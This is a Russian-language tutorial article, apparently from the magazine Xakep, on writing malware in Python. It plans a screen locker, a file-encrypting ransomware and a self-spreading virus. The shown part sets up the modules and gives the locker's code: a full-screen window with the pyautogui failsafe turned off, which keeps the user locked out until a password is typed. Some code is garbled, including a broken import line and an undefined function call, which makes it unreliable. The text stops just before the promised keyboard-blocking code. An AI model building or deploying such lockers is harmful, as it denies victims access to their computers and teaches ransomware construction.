Почему кому-то может прийти в голову писать малварь на Python? Мы сделаем это, чтобы изучить общие принципы вредоносостроения, а заодно ты попрактикуешься в использовании этого языка и сможешь применять полученные знания в других целях. К тому же малварь на Python таки попадается в дикой природе, и далеко не все антивирусы обращают на нее внимание.

Чаще всего Python применяют для создания бэкдоров в софте, чтобы загружать и исполнять любой код на зараженной машине. Так, в 2017 году сотрудники компании Dr.Web обнаружили Python.BackDoor.33, а 8 мая 2019 года был замечен Mac.BackDoor.Siggen.20. Другой троян — RAT Python крал пользовательские данные с зараженных устройств и использовал Telegram в качестве канала передачи данных.

Мы же создадим три демонстрационные программы: локер, который будет блокировать доступ к компьютеру, пока пользователь не введет правильный пароль, шифровальщик, который будет обходить директории и шифровать все лежащие в них файлы, а также вирус, который будет распространять свой код, заражая другие программы на Python.

INFO Тема удаленного администрирования зараженных машин осталась за рамками этой статьи, однако ты можешь почерпнуть основу для кода со всеми объяснениями в статье «Reverse shell на Python».

Несмотря на то что наши творения не претендуют на сколько-нибудь высокий технический уровень, они в определенных условиях могут быть опасными. Поэтому предупреждаю, что за нарушение работы чужих компьютеров и уничтожение информации может последовать строгое наказание. Давай сразу договоримся: запускать все, что мы здесь описываем, ты будешь только на своей машине, да и то осторожно — чтобы случайно не зашифровать себе весь диск.

WARNING Вся информация предоставлена исключительно в ознакомительных целях. Ни автор, ни редакция не несут ответственности за любой возможный вред, причиненный материалами данной статьи.

Настройка среды

Итак, первым делом нам, конечно, понадобится сам Python, причем третьей версии. Не буду детально расписывать, как его устанавливать, и сразу отправлю тебя скачивать бесплатную книгу «Укус питона» (PDF). В ней ты найдешь ответ на этот и многие другие вопросы, связанные с Python.

Дополнительно установим несколько модулей, которые будем использовать:

pip install pyAesCrypt pip install pyautogui pip install tkinter

На этом с подготовительным этапом покончено, можно приступать к написанию кода.

Локер

Идея — создаем окно на полный экран и не даем пользователю закрыть его.

Импорт библиотек:

import pyautogui from tkinter import Tk, Entry, Label from pyautogu соi import click, moveTo from time import sleep

Теперь возьмемся за основную часть программы.

# Создаем окно root = Tk() # Вырубаем защиту левого верхнего угла экрана pyautogui.FAILSAFE = False # Получаем ширину и высоту окна width = root.winfo_screenwidth() height = root.winfo_screenheight() # Задаем заголовок окна root.title('From "Xakep" with love') # Открываем окно на весь экран root.attributes("-fullscreen", True) # Создаем поле для ввода, задаем его размеры и расположение entry = Entry(root, font=1) entry.place(width=150, height=50, x=width/2-75, y=height/2-25) # Создаем текстовые подписи и задаем их расположение label0 = Label(root, text="╚(•⌂•)╝ Locker by Xakep (╯°□°)╯︵ ┻━┻", font=1) label0.grid(row=0, column=0) label1 = Label(root, text="Пиши пароль и жми Ctrl + C", font='Arial 20') label1.place(x=width/2-75-130, y=height/2-25-100) # Включаем постоянное обновление окна и делаем паузу root.update() sleep(0.2) # Кликаем в центр окна click(width/2, height/2) # обнуляем ключ k = False # Теперь непрерывно проверяем, не введен ли верный ключ # Если введен, вызываем функцию хулиганства while not k: on_closing()

Здесь pyautogui.FAILSAFE = False — защита, которая активируется при перемещении курсора в верхний левый угол экрана. При ее срабатывании программа закрывается. Нам это не надо, поэтому вырубаем эту функцию.

Чтобы наш локер работал на любом мониторе с любым разрешением, считываем ширину и высоту экрана и по простой формуле вычисляем, куда будет попадать курсор, делаться клик и так далее. В нашем случае курсор попадает в центр экрана, то есть ширину и высоту мы делим на два. Паузу ( sleep ) добавим для того, чтобы пользователь мог ввести код для отмены.

Сейчас мы не блокировали ввод текста, но можно это сделать, и тогда пользователь никак от нас не избавится. Для этого напишем еще немного кода. Не советую делать это сразу. Сначала давай настроим программу, чтобы она выключалась при вводе пароля. Но код для блокирования клавиатуры и мыши выглядит вот так: